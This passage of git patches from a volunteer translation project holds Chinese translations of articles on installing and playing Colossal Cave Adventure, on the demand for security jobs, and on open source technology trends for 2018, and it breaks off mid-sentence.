[**Pacaur**][2]: +``` +pacaur -S open-adventure +``` + +使用 [**Packer**][3]: +``` +packer -S open-adventure +``` + +使用 [**Yaourt**][4]: +``` +yaourt -S open-adventure +``` + +在其他 Linux 发行版上,你也许需要经过如下步骤来从源代码编译并安装这款游戏。 + +首先安装依赖项: + +在 Debian 和 Ubuntu 上: +``` +sudo apt-get install python3-yaml libedit-dev +``` + +在 Fedora 上: +``` +sudo dnf install python3-PyYAML libedit-devel +``` + +你也可以使用 pip 来安装 PyYAML: +``` +sudo pip3 install PyYAML +``` + +安装好依赖项之后,用以下命令从源代码编译并安装 open-adventure: +``` +git clone https://gitlab.com/esr/open-adventure.git +``` +``` +make +``` +``` +make check +``` + +最后,运行 ‘advent’ 程序开始游戏: +``` +advent +``` + +在 [**Google Play store**][5] 上还有这款游戏的安卓版。 + +### 游戏说明 + +要开始游戏,只需在终端中输入这个命令: +``` +advent +``` + +你会看到一个欢迎界面。按 “y” 来查看教程,或者按 “n“ 来开始冒险之旅。 + +![][6] + +游戏在一个小砖房前面开始。玩家需要使用由一到两个简单的英语单词单词组成的命令来控制角色。要移动角色,只需输入 **in**、 **out**、**enter**、**exit**、**building**、**forest**、**east**、**west**、**north**、**south**、**up** 或 **down** 等指令。 + +比如说,如果你输入 **”south“** 或者简写 **”s“**,游戏角色就会向当前位置的南方移动。注意每个单词只有前五个字母有效,所以当你需要输入更长的单词时需要使用缩写,比如要输入 **northeast** 时,只需输入 NE(大小写均可)。要输入 **southeast** 则使用 SE。要捡起物品,输入 **pick**。要进入一个建筑物或者其他的场景,输入 **in**。要从任何场景离开,输入 **exit**,诸如此类。当你遇到危险时你会受到警告。你也可以使用两个单词的短语作为命令,比如 **”eat food“**、**”drink water“**、**”get lamp“**、**”light lamp“**、**”kill snake“** 等等。你可以在任何时候输入 **”help“** 来显示游戏帮助。 + +![][8] + +我花了一整个下午来探索这款游戏。天哪,这真是段超级有趣、激动人心又紧张刺激的冒险体验! + +![][9] + +我打通了许多关卡并在路上探索了各式各样的场景。我甚至找到了金子,还被一条蛇和一个矮人袭击过。我必须承认这款游戏真是非常让人上瘾,简直是最好的时间杀手。 + +如果你安全地带着财宝离开了洞穴,你会取得游戏胜利,并获得财宝全部的所有权。你在找到财宝的时候也会获得部分的奖励。要提前离开你的冒险,输入 **”quit“**。要暂停冒险,输入 **”suspend“**(或者 ”pause“ 或 ”save“)。你可以在之后继续冒险。要看你现在的进展如何,输入 **”score“**。记住,被杀或者退出会导致丢分。 + +祝你们玩得开心!再见! + + + +-------------------------------------------------------------------------------- + +via: https://www.ostechnix.com/colossal-cave-adventure-famous-classic-text-based-adventure-game/ + +作者:[SK][a] +译者:[yixunx](https://github.com/yixunx) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.ostechnix.com/author/sk/ +[1]:https://aur.archlinux.org/packages/open-adventure/ +[2]:https://www.ostechnix.com/install-pacaur-arch-linux/ +[3]:https://www.ostechnix.com/install-packer-arch-linux-2/ +[4]:https://www.ostechnix.com/install-yaourt-arch-linux/ +[5]:https://play.google.com/store/apps/details?id=com.ecsoftwareconsulting.adventure430 +[6]:https://www.ostechnix.com/wp-content/uploads/2017/12/Colossal-Cave-Adventure-2.png +[7]:http://www.ostechnix.com/wp-content/uploads/2017/12/Colossal-Cave-Adventure-2.png +[8]:http://www.ostechnix.com/wp-content/uploads/2017/12/Colossal-Cave-Adventure-3.png +[9]:http://www.ostechnix.com/wp-content/uploads/2017/12/Colossal-Cave-Adventure-1.png From dc493d6f4c307f2cb5fa0807646819c08dd63f94 Mon Sep 17 00:00:00 2001 From: geekpi Date: Mon, 18 Dec 2017 08:47:59 +0800 Subject: [PATCH 0675/1627] translated --- ...obs Are Hot Get Trained and Get Noticed.md | 60 ------------------- ...obs Are Hot Get Trained and Get Noticed.md | 58 ++++++++++++++++++ 2 files changed, 58 insertions(+), 60 deletions(-) delete mode 100644 sources/tech/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md create mode 100644 translated/tech/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md diff --git a/sources/tech/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md b/sources/tech/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md deleted file mode 100644 index 002477680c..0000000000 --- a/sources/tech/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md +++ /dev/null @@ -1,60 +0,0 @@ -translating---geekpi - -Security Jobs Are Hot: Get Trained and Get Noticed -============================================================ - -![security skills](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/security-skills.png?itok=IrwppCUw "security skills") -The Open Source Jobs Report, from Dice and The Linux Foundation, found that professionals with security experience are in high demand for the future.[Used with permission][1] - -The demand for security professionals is real. On [Dice.com][4], 15 percent of the more than 75K jobs are security positions. “Every year in the U.S., 40,000 jobs for information security analysts go unfilled, and employers are struggling to fill 200,000 other cyber-security related roles, according to cyber security data tool [CyberSeek][5]” ([Forbes][6]). We know that there is a fast-increasing need for security specialists, but that the interest level is low. - -### Security is the place to be - -In my experience, few students coming out of college are interested in roles in security; so many people see security as niche. Entry-level tech pros are interested in business analyst or system analyst roles, because of a belief that if you want to learn and apply core IT concepts, you have to stick to analyst roles or those closer to product development. That’s simply not the case. - -In fact, if you’re interested in getting in front of your business leaders, security is the place to be – as a security professional, you have to understand the business end-to-end; you have to look at the big picture to give your company the advantage. - -### Be fearless - -Analyst and security roles are not all that different. Companies continue to merge engineering and security roles out of necessity. Businesses are moving faster than ever with infrastructure and code being deployed through automation, which increases the importance of security being a part of all tech pros day to day lives. In our [Open Source Jobs Report with The Linux Foundation][7], 42 percent of hiring managers said professionals with security experience are in high demand for the future. - -There has never been a more exciting time to be in security. If you stay up-to-date with tech news, you’ll see that a huge number of stories are related to security – data breaches, system failures and fraud. The security teams are working in ever-changing, fast-paced environments. A real challenge lies is in the proactive side of security, finding, and eliminating vulnerabilities while maintaining or even improving the end-user experience.   - -### Growth is imminent - -Of any aspect of tech, security is the one that will continue to grow with the cloud. Businesses are moving more and more to the cloud and that’s exposing more security vulnerabilities than organizations are used to. As the cloud matures, security becomes increasingly important.            - -Regulations are also growing – Personally Identifiable Information (PII) is getting broader all the time. Many companies are finding that they must invest in security to stay in compliance and avoid being in the headlines. Companies are beginning to budget more and more for security tooling and staffing due to the risk of heavy fines, reputational damage, and, to be honest, executive job security.   - -### Training and support - -Even if you don’t choose a security-specific role, you’re bound to find yourself needing to code securely, and if you don’t have the skills to do that, you’ll start fighting an uphill battle. There are certainly ways to learn on-the-job if your company offers that option, that’s encouraged but I recommend a combination of training, mentorship and constant practice. Without using your security skills, you’ll lose them fast with how quickly the complexity of malicious attacks evolve. - -My recommendation for those seeking security roles is to find the people in your organization that are the strongest in engineering, development, or architecture areas – interface with them and other teams, do hands-on work, and be sure to keep the big-picture in mind. Be an asset to your organization that stands out – someone that can securely code and also consider strategy and overall infrastructure health. - -### The end game - -More and more companies are investing in security and trying to fill open roles in their tech teams. If you’re interested in management, security is the place to be. Executive leadership wants to know that their company is playing by the rules, that their data is secure, and that they’re safe from breaches and loss. - -Security that is implemented wisely and with strategy in mind will get noticed. Security is paramount for executives and consumers alike – I’d encourage anyone interested in security to train up and contribute. - - _[Download ][2]the full 2017 Open Source Jobs Report now._ - --------------------------------------------------------------------------------- - -via: https://www.linux.com/blog/os-jobs-report/2017/11/security-jobs-are-hot-get-trained-and-get-noticed - -作者:[ BEN COLLEN][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://www.linux.com/users/bencollen -[1]:https://www.linux.com/licenses/category/used-permission -[2]:http://bit.ly/2017OSSjobsreport -[3]:https://www.linux.com/files/images/security-skillspng -[4]:http://www.dice.com/ -[5]:http://cyberseek.org/index.html#about -[6]:https://www.forbes.com/sites/jeffkauflin/2017/03/16/the-fast-growing-job-with-a-huge-skills-gap-cyber-security/#292f0a675163 -[7]:http://media.dice.com/report/the-2017-open-source-jobs-report-employers-prioritize-hiring-open-source-professionals-with-latest-skills/ diff --git a/translated/tech/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md b/translated/tech/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md new file mode 100644 index 0000000000..5834271731 --- /dev/null +++ b/translated/tech/20171115 Security Jobs Are Hot Get Trained and Get Noticed.md @@ -0,0 +1,58 @@ +安全工作热门:受到培训并获得注意 +============================================================ + +![security skills](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/security-skills.png?itok=IrwppCUw "security skills") +来自 Dice 和 Linux 基金会的“开源工作报告”发现,未来对具有安全经验的专业人员的需求很高。[经许可使用][1] + +对安全专业人员的需求是真实的。在 [Dice.com][4] 中,超过 75,000 个职位中有 15% 是安全职位。[Forbes][6] 中称:“根据网络安全数据工具 [Cyber​​Seek][5],在美国每年有 4 万个信息安全分析师的职位空缺,雇主正在努力填补其他 20 万个与网络安全相关的工作。”我们知道,安全专家的需求正在快速增长,但兴趣水平还很低。 + +### 安全是要关注的领域 + +根据我的经验,很少有大学生对安全工作感兴趣,所以很多人把安全视为利基。入门级技术专家对业务分析师或系统分析师感兴趣,因为他们认为,如果想学习和应用核心 IT 概念,就必须坚持分析师工作或者更接近产品开发的工作。事实并非如此。 + +事实上,如果你有兴趣领先于商业领导者,那么安全是要关注的领域 - 作为一名安全专业人员,你必须端到端地了解业务,你必须看大局来给你的公司优势。 + +### 无所畏惧 + +分析师和安全工作并不完全相同。公司出于必要继续合并工程和安全工作。企业正在以前所未有的速度进行基础架构和代码的自动化部署,从而提高了安全作为所有技术专业人士日常生活的一部分的重要性。在我们的[ Linux 基金会的开源工作报告][7]中,42% 的招聘经理表示未来对有安全经验的专业人士的需求很大。 + +在安全方面从未有过更激动人心的时刻。如果你随时掌握最新的技术新闻,就会发现大量的事情与安全相关 - 数据泄露、系统故障和欺诈。安全团队正在不断变化,快节奏的环境中工作。真正的挑战在于在保持甚至改进最终用户体验的同时,积极主动地进行安全性,发现和消除漏洞。   + +### 增长即将来临 + +在技​​术的任何方面,安全将继续与云一起成长。企业越来越多地转向云计算,这暴露出比组织过去更多的安全漏洞。随着云的成熟,安全变得越来越重要。 + +条例也在不断完善 - 个人身份信息(PII)越来越广泛。许多公司都发现他们必须投资安全来保持合规,避免成为头条新闻。由于面临巨额罚款,声誉受损以及行政工作安全,公司开始越来越多地为安全工具和人员安排越来越多的预算。 + +### 培训和支持 + +即使你不选择一个特定的安全工作,你也一定会发现自己需要写安全的代码,如果你没有这个技能,你将开始一场艰苦的战斗。如果你的公司提供在工作中学习的话也是鼓励的,但我建议结合培训、指导和不断实践。如果你不使用安全技能,你将很快在快速进化的恶意攻击的复杂性中失去它们。 + +对于那些寻找安全工作的人来说,我的建议是找到组织中那些在工程、开发或者架构领域最为强大的人员 - 与他们和其他团队进行交流,做好实际工作,并且确保在心里保持大局。成为你的组织中一个脱颖而出的人,一个可以写安全的代码,同时也可以考虑战略和整体基础设施健康状况的人。 + +### 游戏最后 + +越来越多的公司正在投资安全性,并试图填补他们的技术团队的开放角色。如果你对管理感兴趣,那么安全是值得关注的地方。执行领导希望知道他们的公司正在按规则行事,他们的数据是安全的,并且免受破坏和损失。 + +明治地实施和有战略思想的安全是受到关注的。安全对高管和消费者之类至关重要 - 我鼓励任何对安全感兴趣的人进行培训和贡献。 + + _现在[下载][2]完整的 2017 年开源工作报告_ + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/blog/os-jobs-report/2017/11/security-jobs-are-hot-get-trained-and-get-noticed + +作者:[ BEN COLLEN][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linux.com/users/bencollen +[1]:https://www.linux.com/licenses/category/used-permission +[2]:http://bit.ly/2017OSSjobsreport +[3]:https://www.linux.com/files/images/security-skillspng +[4]:http://www.dice.com/ +[5]:http://cyberseek.org/index.html#about +[6]:https://www.forbes.com/sites/jeffkauflin/2017/03/16/the-fast-growing-job-with-a-huge-skills-gap-cyber-security/#292f0a675163 +[7]:http://media.dice.com/report/the-2017-open-source-jobs-report-employers-prioritize-hiring-open-source-professionals-with-latest-skills/ From 2c28600cc036cf1f748acc200348c09fa65b940c Mon Sep 17 00:00:00 2001 From: geekpi Date: Mon, 18 Dec 2017 08:51:13 +0800 Subject: [PATCH 0676/1627] translating --- ...19 How to auto start LXD containers at boot time in Linux.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20170219 How to auto start LXD containers at boot time in Linux.md b/sources/tech/20170219 How to auto start LXD containers at boot time in Linux.md index 69b0d9531f..0958e8c691 100644 --- a/sources/tech/20170219 How to auto start LXD containers at boot time in Linux.md +++ b/sources/tech/20170219 How to auto start LXD containers at boot time in Linux.md @@ -1,3 +1,5 @@ +translating---geekpi + How to auto start LXD containers at boot time in Linux ====== I am using LXD ("Linux container") based VM. How do I set an LXD container to start on boot in Linux operating system? From 376043e025097f1081911f36c7755d283092290a Mon Sep 17 00:00:00 2001 From: wangy325 Date: Mon, 18 Dec 2017 12:09:19 +0800 Subject: [PATCH 0677/1627] upload tranlated doc and del origin file. --- ... open source technology trends for 2018.md | 143 ----------------- ...EN SOURCE TECHNOLOGY TRENDS FOR 2018_cn.md | 146 ++++++++++++++++++ 2 files changed, 146 insertions(+), 143 deletions(-) delete mode 100644 sources/tech/20171129 10 open source technology trends for 2018.md create mode 100644 translated/tech/10 OPEN SOURCE TECHNOLOGY TRENDS FOR 2018_cn.md diff --git a/sources/tech/20171129 10 open source technology trends for 2018.md b/sources/tech/20171129 10 open source technology trends for 2018.md deleted file mode 100644 index eb21c62ec9..0000000000 --- a/sources/tech/20171129 10 open source technology trends for 2018.md +++ /dev/null @@ -1,143 +0,0 @@ -translating by wangy325... - - -10 open source technology trends for 2018 -============================================================ - -### What do you think will be the next open source tech trends? Here are 10 predictions. - -![10 open source technology trends for 2018](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/fireworks-newyear-celebrate.png?itok=6gXaznov "10 open source technology trends for 2018") -Image by : [Mitch Bennett][10]. Modified by Opensource.com. [CC BY-SA 4.0][11] - -Technology is always evolving. New developments, such as OpenStack, Progressive Web Apps, Rust, R, the cognitive cloud, artificial intelligence (AI), the Internet of Things, and more are putting our usual paradigms on the back burner. Here is a rundown of the top open source trends expected to soar in popularity in 2018. - -### 1\. OpenStack gains increasing acceptance - -[OpenStack][12] is essentially a cloud operating system that offers admins the ability to provision and control huge compute, storage, and networking resources through an intuitive and user-friendly dashboard. - -Many enterprises are using the OpenStack platform to build and manage cloud computing systems. Its popularity rests on its flexible ecosystem, transparency, and speed. It supports mission-critical applications with ease and lower costs compared to alternatives. But, OpenStack's complex structure and its dependency on virtualization, servers, and extensive networking resources has inhibited its adoption by a wider range of enterprises. Using OpenStack also requires a well-oiled machinery of skilled staff and resources. - -The OpenStack Foundation is working overtime to fill the voids. Several innovations, either released or on the anvil, would resolve many of its underlying challenges. As complexities decrease, OpenStack will surge in acceptance. The fact that OpenStack is already backed by many big software development and hosting companies, in addition to thousands of individual members, makes it the future of cloud computing. - -### 2\. Progressive Web Apps become popular - -[Progressive Web Apps][13] (PWA), an aggregation of technologies, design concepts, and web APIs, offer an app-like experience in the mobile browser. - -Traditional websites suffer from many inherent shortcomings. Apps, although offering a more personal and focused engagement than websites, place a huge demand on resources, including needing to be downloaded upfront. PWA delivers the best of both worlds. It delivers an app-like experience to users while being accessible on browsers, indexable on search engines, and responsive to fit any form factor. Like an app, a PWA updates itself to always display the latest real-time information, and, like a website, it is delivered in an ultra-safe HTTPS model. It runs in a standard container and is accessible to anyone who types in the URL, without having to install anything. - -PWAs perfectly suit the needs of today's mobile users, who value convenience and personal engagement over everything else. That this technology is set to soar in popularity is a no-brainer. - -### 3\. Rust to rule the roost - -Most programming languages come with safety vs. control tradeoffs. [Rust][14] is an exception. The language co-opts extensive compile-time checking to offer 100% control without compromising safety. The last [Pwn2Own][15] competition threw up many serious vulnerabilities in Firefox on account of its underlying C++ language. If Firefox had been written in Rust, many of those errors would have manifested as compile-time bugs and resolved before the product rollout stage. - -Rust's unique approach of built-in unit testing has led developers to consider it a viable first-choice open source language. It offers an effective alternative to languages such as C and Python to write secure code without sacrificing expressiveness. Rust has bright days ahead in 2018. - -### 4\. R user community grows - -The [R][16] programming language, a GNU project, is associated with statistical computing and graphics. It offers a wide array of statistical and graphical techniques and is extensible to boot. It starts where [S][17] ends. With the S language already the vehicle of choice for research in statistical methodology, R offers a viable open source route for data manipulation, calculation, and graphical display. An added benefit is R's attention to detail and care for the finer nuances. - -Like Rust, R's fortunes are on the rise. - -### 5\. XaaS expands in scope - -XaaS, an acronym for "anything as a service," stands for the increasing number of services delivered over the internet, rather than on premises. Although software as a service (SaaS), infrastructure as a service (IaaS), and platform as a service (PaaS) are well-entrenched, new cloud-based models, such as network as a service (NaaS), storage as a service (SaaS or StaaS), monitoring as a service (MaaS), and communications as a service (CaaS), are soaring in popularity. A world where anything and everything is available "as a service" is not far away. - -The scope of XaaS now extends to bricks-and-mortar businesses, as well. Good examples are companies such as Uber and Lyft leveraging digital technology to offer transportation as a service and Airbnb offering accommodations as a service. - -High-speed networks and server virtualization that make powerful computing affordable have accelerated the popularity of XaaS, to the point that 2018 may become the "year of XaaS." The unmatched flexibility, agility, and scalability will propel the popularity of XaaS even further. - -### 6\. Containers gain even more acceptance - -Container technology is the approach of packaging pieces of code in a standardized way so they can be "plugged and run" quickly in any environment. Container technology allows enterprises to cut costs and implementation times. While the potential of containers to revolutionize IT infrastructure has been evident for a while, actual container use has remained complex. - -Container technology is still evolving, and the complexities associated with the technology decrease with every advancement. The latest developments make containers quite intuitive and as easy as using a smartphone, not to mention tuned for today's needs, where speed and agility can make or break a business. - -### 7\. Machine learning and artificial intelligence expand in scope - -[Machine learning and AI][18] give machines the ability to learn and improve from experience without a programmer explicitly coding the instruction. - -These technologies are already well entrenched, with several open source technologies leveraging them for cutting-edge services and applications. - -[Gartner predicts][19] the scope of machine learning and artificial intelligence will expand in 2018\. Several greenfield areas, such as data preparation, integration, algorithm selection, training methodology selection, and model creation are all set for big-time enhancements through the infusion of machine learning. - -New open source intelligent solutions are set to change the way people interact with systems and transform the very nature of work. - -* Conversational platforms, such as chatbots, make the question-and-command experience, where a user asks a question and the platform responds, the default medium of interacting with machines. - -* Autonomous vehicles and drones, fancy fads today, are expected to become commonplace by 2018. - -* The scope of immersive experience will expand beyond video games and apply to real-life scenarios such as design, training, and visualization processes. - -### 8\. Blockchain becomes mainstream - -Blockchain has come a long way from Bitcoin. The technology is already in widespread use in finance, secure voting, authenticating academic credentials, and more. In the coming year, healthcare, manufacturing, supply chain logistics, and government services are among the sectors most likely to embrace blockchain technology. - -Blockchain distributes digital information. The information resides on millions of nodes, in shared and reconciled databases. The fact that it's not controlled by any single authority and has no single point of failure makes it very robust, transparent, and incorruptible. It also solves the threat of a middleman manipulating the data. Such inherent strengths account for blockchain's soaring popularity and explain why it is likely to emerge as a mainstream technology in the immediate future. - -### 9\. Cognitive cloud moves to center stage - -Cognitive technologies, such as machine learning and artificial intelligence, are increasingly used to reduce complexity and personalize experiences across multiple sectors. One case in point is gamification apps in the financial sector, which offer investors critical investment insights and reduce the complexities of investment models. Digital trust platforms reduce the identity-verification process for financial institutions by about 80%, improving compliance and reducing chances of fraud. - -Such cognitive cloud technologies are now moving to the cloud, making it even more potent and powerful. IBM Watson is the most well-known example of the cognitive cloud in action. IBM's UIMA architecture was made open source and is maintained by the Apache Foundation. DARPA's DeepDive project mirrors Watson's machine learning abilities to enhance decision-making capabilities over time by learning from human interactions. OpenCog, another open source platform, allows developers and data scientists to develop artificial intelligence apps and programs. - -Considering the high stakes of delivering powerful and customized experiences, these cognitive cloud platforms are set to take center stage over the coming year. - -### 10\. The Internet of Things connects more things - -At its core, the Internet of Things (IoT) is the interconnection of devices through embedded sensors or other computing devices that enable the devices (the "things") to send and receive data. IoT is already predicted to be the next big major disruptor of the tech space, but IoT itself is in a continuous state of flux. - -One innovation likely to gain widespread acceptance within the IoT space is Autonomous Decentralized Peer-to-Peer Telemetry ([ADEPT][20]), which is propelled by IBM and Samsung. It uses a blockchain-type technology to deliver a decentralized network of IoT devices. Freedom from a central control system facilitates autonomous communications between "things" in order to manage software updates, resolve bugs, manage energy, and more. - -### Open source drives innovation - -Digital disruption is the norm in today's tech-centric era. Within the technology space, open source is now pervasive, and in 2018, it will be the driving force behind most of the technology innovations. - -Which open source trends and technologies would you add to this list? Let us know in the comments. - -### Topics - - [Business][25][Yearbook][26][2017 Open Source Yearbook][27] - -### About the author - - [![Sreejith@Fingent](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/sreejith.jpg?itok=sdYNV49V)][21] Sreejith - I have been programming since 2000, and professionally since 2007\. I currently lead the Open Source team at [Fingent][6] as we work on different technology stacks, ranging from the "boring"(read tried and trusted) to the bleeding edge. I like building, tinkering with and breaking things, not necessarily in that order. Hit me up at: [https://www.linkedin.com/in/futuregeek/][7][More about me][8] - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/17/11/10-open-source-technology-trends-2018 - -作者:[Sreejith ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/sreejith -[1]:https://opensource.com/resources/what-is-openstack?intcmp=7016000000127cYAAQ -[2]:https://opensource.com/resources/openstack/tutorials?intcmp=7016000000127cYAAQ -[3]:https://opensource.com/tags/openstack?intcmp=7016000000127cYAAQ -[4]:https://www.rdoproject.org/?intcmp=7016000000127cYAAQ -[5]:https://opensource.com/article/17/11/10-open-source-technology-trends-2018?rate=GJqOXhiWvZh0zZ6WVTUzJ2TDJBpVpFhngfuX9V-dz4I -[6]:https://www.fingent.com/ -[7]:https://www.linkedin.com/in/futuregeek/ -[8]:https://opensource.com/users/sreejith -[9]:https://opensource.com/user/185026/feed -[10]:https://www.flickr.com/photos/mitchell3417/9206373620 -[11]:https://creativecommons.org/licenses/by-sa/4.0/ -[12]:https://www.openstack.org/ -[13]:https://developers.google.com/web/progressive-web-apps/ -[14]:https://www.rust-lang.org/ -[15]:https://en.wikipedia.org/wiki/Pwn2Own -[16]:https://en.wikipedia.org/wiki/R_(programming_language) -[17]:https://en.wikipedia.org/wiki/S_(programming_language) -[18]:https://opensource.com/tags/artificial-intelligence -[19]:https://sdtimes.com/gartners-top-10-technology-trends-2018/ -[20]:https://insights.samsung.com/2016/03/17/block-chain-mobile-and-the-internet-of-things/ -[21]:https://opensource.com/users/sreejith -[22]:https://opensource.com/users/sreejith -[23]:https://opensource.com/users/sreejith -[24]:https://opensource.com/article/17/11/10-open-source-technology-trends-2018#comments -[25]:https://opensource.com/tags/business -[26]:https://opensource.com/tags/yearbook -[27]:https://opensource.com/yearbook/2017 diff --git a/translated/tech/10 OPEN SOURCE TECHNOLOGY TRENDS FOR 2018_cn.md b/translated/tech/10 OPEN SOURCE TECHNOLOGY TRENDS FOR 2018_cn.md new file mode 100644 index 0000000000..ab5e952bf7 --- /dev/null +++ b/translated/tech/10 OPEN SOURCE TECHNOLOGY TRENDS FOR 2018_cn.md @@ -0,0 +1,146 @@ +2018 年开源技术 10 大发展趋势 +============================================================ + +### 你是否关注过开源技术的发展趋势? + +![2018 年开源技术的 10 大发展趋势](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/fireworks-newyear-celebrate.png?itok=6gXaznov "10 open source technology trends for 2018") + +图片来源:[Mitch Bennett][10]. [Opensource.com][31] 修改 + +科技一直在发展,诸如OpenStack,PWAs,Rust,R,认知云,人工智能(AI),物联网等一些新技术正在颠覆我们对世界的固有认知。以下是 2018 年最可能成为主流的开源技术纲要。 + +### 1\. OpenStack 认可度持续高涨 + +[OpenStack][12] 本质上是一个云操作平台(系统),它为管理员提供直观友好的控制面板,以便对大量的计算、存储和网络资源进行配置和监管。 + +目前,很多企业运用 OpenStack 平台搭建和管理云计算系统。得益于其灵活的生态系统、透明度和运行速度,OpenStack 越来越流行。相比其他替代方案,OpenStatic 只需更少的花费便能轻松支持任务关键型应用程序。 +但是,复杂的结构以及其对虚拟化、服务器、额外网络资源的严重依赖使得其它一些企业对使用 OpenStack 心存顾虑。另外,想要用好 OpenStack,好的硬件支持和高水平的员工二者缺一不可。 + +OpenStack 基金会一直在致力于完善他们的产品。不管发布与否的一些小的功能创新,都会解决 OpenStack 的潜在问题。随着其结构复杂性降低,OpenStack 将获取更大认可。加之众多大型软件开发和托管公司以及成千上万会员的支持, OpenStack 在云计算时代前途光明。 + +### 2\. PWA 或将大热 + +PWA,即 [增强型网页应用][13],是技术、设计和网络应用程序接口(web APIs)的集合,它能够在移动浏览器上提供类似应用程序的体验 + +传统的网页有许多与生俱来的缺点。虽然应用程序提供了一个比网页更加个性化、用户参与度更高的体验,但是却要占用大量的系统资源;并且要想使用应用,你还必须提前下载安装。PWA 则扬长避短,它为浏览器、可变引擎搜索框和其他一些操作作出响应,为用户提供应用程序般的体验。PWA 也能像应用程序一样自动更新显示最新的信息,基于网页的 HTTPS 模式又让其更加安全。PWA 运行于标准容器中,无须安装,只要输入 URL 即可。 + +现在的移动用户看重便利性和参与度,PWAs 的特性完美契合这一需求,所以 PWA 成为主流是必然趋势。 + +### 3\. Rust 成开发者新宠 + +大多数的编程语言都在安全性和控制二者之间折衷,[Rust][14] 是一个例外。Rust 使用广泛的编译时间检查进行 100% 的控制而不影响程序安全性。上一次 [Pwn2Own][15] 竞赛找出了 Firefox C++ 底层实现的许多严重漏洞。如果 Firefox 是用 Rust 编写的,这些漏洞在产品发布之前的编译阶段就会被发现并解决。 + +Rust 独特的内建单元测试方法使开发者们考虑将其作为首选开源语言。它是 C 和 Python 等其他编程语言有效的替代方案,Rust 可以在不丢失程序可读性的情况下写出安全的代码。总之,Rust 前途光明。 + +### 4\. R 用户群在壮大 + +[R][16] 编程语言,是一个与统计计算和图像呈现相关的 [*GUN* 项目][32]。它提供了大量的统计和图形技术,并且可扩展引导。它是 [S][17] 语言的延续。S 语言早已成为统计方法学的首选工具,R 为数据操作、计算和图形显示提供了开源选择。R 语言的另一个优势是对细节的把控和对细微差别的关注。 + +和 Rust 一样,R 语言也处于上升期。 + +### 5\. 广义的 XaaS + +XaaS 是 ”一切都是服务“ 的缩写,是通过网络提供的各种线上服务的总称。XaaS 的外延正在扩大,软件服务(SaaS),基础设施服务(IaaS) 和平台服务(PaaS)等观念已深入人心,新兴的基于云的服务如网络服务(NaaS),存储服务(SaaS 或StaaS),监控服务(MaaS)以及通信服务(CaaS)等概念也正在普及。我们正在迈向一个 ”一切都是服务“ 的世界。 + +现在,XaaS 的概念已经延伸到实体企业。著名的例子有 Uber 、Lyft 和 Airbnb,前二者利用新科技提供交通服务,后者提供住宿服务。 + +高速网络和服务器虚拟化使得强大的计算能力成为可能,这加速了XaaS的发展,2018 年可能是 ”XaaS 年‘’。XaaS 无与伦比的灵活性、可扩展性将推动 XaaS 进一步发展。 + +### 6\. 容器技术越来越受欢迎 + +[容器技术][28],是用标准化方法打包代码的技术,它使得代码能够在任意环境中快速地 ”接入和运行“。容器技术使企业削减花费、更快运行程序。尽管容器技术在 IT 基础结构改革方面的潜力已经表现的很明显,事实上,运用好容器技术仍然是一个难题。 + +容器技术仍在发展中,技术复杂性随着各方面的进步在下降。最新的技术让容器使用起来像使用智能手机一样简单、直观,更不用说现在的企业需求:速度和灵活性往往能决定业务成败。 + +### 7\. 机器学习和人工智能的更广泛应用 + +[机器学习和人工智能][18] 指在没有程序员给出明确的编码指令的情况下,机器具备自主学习并且积累经验自我改进的能力。 + +随着一些开源技术利用机器学习和人工智能实现尖端服务和应用,这两项技术已经深入人心。 + +[Gartner][19] 预测,2018 年机器学习和人工智能的应用会更广。其他一些领域诸如数据准备、集成、算法选择、方法选择、模块制造等随着机器学习的加入将会取得很大进步。 + +全新的智能开源解决方案将改变人们和系统交互的方式,转变由来已久的工作观念。 + +* 机器交互,像[自助语音聊天程序][29]这样的对话平台,提供“问与答”的体验——用户提出问题,对话平台作出回应。 +* 无人驾驶和无人机现在已经家喻户晓了,2018年将会更司空见惯。 +* 沉浸式体验的应用不再仅仅局限于视频游戏,在真实的生活场景比如设计、培训和可视化过程中都能看到沉浸式体验的身影。 + +### 8. 数据区块链将成为主流 + +自比特币应用数据区块链技术以来,其已经取得了重大进展,并且已广泛应用在金融系统、保密选举、学历验证、等领域中。未来几年,区块链会在医疗、制造业、供应链物流、政府服务等领域中大展拳脚。 + +数据区块链分布式存储数据信息,这些数据信息依赖于数百万个共享数据库的节点。数据区块不被任意单一所有者控制,并且单个损坏的节点不影响其正常运行,数据区块链的这两个特性让它异常健康、透明、不可破坏。同时也规避了有人从中篡改数据的风险。数据区块链强大的先天优势足够支撑其成为将来主流技术。 + +### 9.认知云粉墨登场 + +认识技术,如前所述的机器学习和人工智能,用于为多行业提供简单化和个性化服务。一个典型例子是金融行业的游戏化应用,其为投资者提供严谨的投资建议,降低投资模块的复杂程度。数字信托平台使得金融机构的身份认证过程较以前精简80%,提升了协议遵守率,降低了诈骗率。 + +认知云技术现在正向云端迁移,借助云,它将更加强大。[IBM Watson][33] 是认知云应用最知名的例子。IBM 的 UIMA 架构是开源的,由 Apache 负责维护。DARPA(美国国防高级研究计划局) 的 